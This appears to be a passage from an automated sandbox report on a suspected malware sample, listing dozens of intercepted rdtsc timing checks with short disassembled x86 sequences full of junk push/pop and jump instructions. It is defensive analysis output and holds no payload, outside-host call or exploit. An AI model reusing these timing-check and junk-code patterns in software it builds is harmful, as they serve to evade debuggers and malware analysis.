Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 999F25 second address: 999F37 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FB7D509B862h 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 999F37 second address: 999F3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99A234 second address: 99A238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99A238 second address: 99A23E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99A681 second address: 99A689 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99A689 second address: 99A68F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99A68F second address: 99A6A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB7D509B84Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99A6A2 second address: 99A6DE instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB7D50A5ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FB7D50A5EE4h 0x00000010 jmp 00007FB7D50A5EE2h 0x00000015 pop eax 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e pop eax 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99A6DE second address: 99A6E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99A881 second address: 99A887 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99A887 second address: 99A897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FB7D509B84Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 999913 second address: 999937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB7D50A5EDDh 0x00000009 popad 0x0000000a popad 0x0000000b jg 00007FB7D50A5EFDh 0x00000011 push ebx 0x00000012 jp 00007FB7D50A5ED6h 0x00000018 pop ebx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A2DE1 second address: 9A2DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A2DE5 second address: 9A2DEF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB7D50A5ED6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A2DEF second address: 9A2DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 je 00007FB7D509B846h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A2F5C second address: 9A2F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB7D50A5EE8h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB7D50A5EE7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A5A60 second address: 9A5A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B2544 second address: 9B255A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB7D50A5ED6h 0x00000008 jmp 00007FB7D50A5EDCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B6DAD second address: 9B6DB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B6DB1 second address: 9B6DCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB7D50A5EE1h 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B6DCC second address: 9B6DD7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B696C second address: 9B6970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B6970 second address: 9B6984 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB7D509B846h 0x00000008 ja 00007FB7D509B846h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B6984 second address: 9B6988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B6B02 second address: 9B6B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B6B08 second address: 9B6B24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EDCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FB7D50A5EDCh 0x0000000f jnl 00007FB7D50A5ED6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B6B24 second address: 9B6B29 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C0205 second address: 9C022F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jnp 00007FB7D50A5ED6h 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FB7D50A5EE7h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D74EF second address: 8D74F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D74F5 second address: 8D74FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D74FD second address: 8D7504 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D7504 second address: 8D7511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FB7D50A5EE2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C0091 second address: 9C009F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jbe 00007FB7D509B846h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C009F second address: 9C00A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C00A9 second address: 9C00BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 popad 0x0000000a jo 00007FB7D509B854h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CF819 second address: 9CF823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FB7D50A5ED6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CF823 second address: 9CF82D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB7D509B846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CE452 second address: 9CE456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CE456 second address: 9CE4B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B84Fh 0x00000007 jmp 00007FB7D509B858h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 ja 00007FB7D509B846h 0x00000017 jmp 00007FB7D509B84Dh 0x0000001c jmp 00007FB7D509B84Bh 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push edi 0x00000025 jnp 00007FB7D509B846h 0x0000002b pushad 0x0000002c popad 0x0000002d pop edi 0x0000002e push ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CE4B2 second address: 9CE4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CE4B9 second address: 9CE4D3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB7D509B848h 0x00000008 push ebx 0x00000009 jmp 00007FB7D509B84Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CEA75 second address: 9CEA7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FB7D50A5ED6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D3219 second address: 9D321D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D321D second address: 9D323E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FB7D50A5EEFh 0x0000000c jmp 00007FB7D50A5EE3h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D3392 second address: 9D3397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D3397 second address: 9D33AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 js 00007FB7D50A5ED6h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FB7D50A5ED6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D731B second address: 9D7325 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D7325 second address: 9D732B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D732B second address: 9D735B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FB7D509B856h 0x00000012 jl 00007FB7D509B846h 0x00000018 jnp 00007FB7D509B846h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E5520 second address: 9E5526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E5526 second address: 9E552B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E552B second address: 9E5533 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E5533 second address: 9E5537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E6CE7 second address: 9E6CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E6CF1 second address: 9E6D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FB7D509B854h 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FB7D509B84Ch 0x00000012 popad 0x00000013 pushad 0x00000014 jo 00007FB7D509B84Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F48D8 second address: 9F48DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F48DC second address: 9F48E2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0C9C9 second address: A0C9D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FB7D50A5ED6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0C9D8 second address: A0CA2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB7D509B855h 0x00000009 jmp 00007FB7D509B84Eh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 je 00007FB7D509B846h 0x0000001a jmp 00007FB7D509B84Bh 0x0000001f jmp 00007FB7D509B856h 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0CBC1 second address: A0CBC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0D5B4 second address: A0D5B9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0D88A second address: A0D8A0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jc 00007FB7D50A5ED6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jno 00007FB7D50A5ED6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0D8A0 second address: A0D8CD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jno 00007FB7D509B846h 0x0000000f jmp 00007FB7D509B855h 0x00000014 pop esi 0x00000015 jbe 00007FB7D509B84Eh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A104DB second address: A104E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A104E0 second address: A104E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A105B2 second address: A105B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A105B6 second address: A105BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A105BA second address: A105C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A105C0 second address: A105C5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A107B6 second address: A107CD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB7D50A5ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jc 00007FB7D50A5EE0h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1082F second address: A10845 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB7D509B846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007FB7D509B846h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A10845 second address: A1084B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1084B second address: A10902 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B859h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub dx, 53F5h 0x0000000f push 00000004h 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FB7D509B848h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b xor dword ptr [ebp+122D248Fh], esi 0x00000031 call 00007FB7D509B849h 0x00000036 pushad 0x00000037 push esi 0x00000038 jp 00007FB7D509B846h 0x0000003e pop esi 0x0000003f pushad 0x00000040 jmp 00007FB7D509B857h 0x00000045 jc 00007FB7D509B846h 0x0000004b popad 0x0000004c popad 0x0000004d push eax 0x0000004e pushad 0x0000004f push ebx 0x00000050 push edx 0x00000051 pop edx 0x00000052 pop ebx 0x00000053 jmp 00007FB7D509B84Bh 0x00000058 popad 0x00000059 mov eax, dword ptr [esp+04h] 0x0000005d push eax 0x0000005e push edx 0x0000005f jne 00007FB7D509B85Dh 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A10902 second address: A10929 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FB7D50A5ED6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A10929 second address: A1093B instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB7D509B846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FB7D509B846h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A11F75 second address: A11F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A11F7B second address: A11F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A11F89 second address: A11F8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A11F8D second address: A11F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A11F93 second address: A11FCA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FB7D50A5EE8h 0x00000008 jmp 00007FB7D50A5EE5h 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B00D2 second address: 50B00DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 880Eh 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B00DB second address: 50B016D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FB7D50A5EDEh 0x00000011 xor eax, 56A5E688h 0x00000017 jmp 00007FB7D50A5EDBh 0x0000001c popfd 0x0000001d mov dx, cx 0x00000020 popad 0x00000021 push eax 0x00000022 pushad 0x00000023 call 00007FB7D50A5EDBh 0x00000028 pushfd 0x00000029 jmp 00007FB7D50A5EE8h 0x0000002e jmp 00007FB7D50A5EE5h 0x00000033 popfd 0x00000034 pop ecx 0x00000035 movsx edx, ax 0x00000038 popad 0x00000039 xchg eax, ebp 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FB7D50A5EDFh 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B016D second address: 50B01CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FB7D509B855h 0x0000000b sub cx, 9F16h 0x00000010 jmp 00007FB7D509B851h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b jmp 00007FB7D509B84Eh 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FB7D509B857h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0011 second address: 50A0015 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0015 second address: 50A001B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E0172 second address: 50E0178 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 507011E second address: 5070147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FB7D509B854h 0x0000000a sub ah, 00000058h 0x0000000d jmp 00007FB7D509B84Bh 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5070147 second address: 507014C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 507014C second address: 5070165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, bx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push dword ptr [ebp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB7D509B84Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5070165 second address: 507018B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, AE64h 0x00000007 mov di, 4CD0h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push dword ptr [ebp+0Ch] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FB7D50A5EE1h 0x0000001a rdtsc
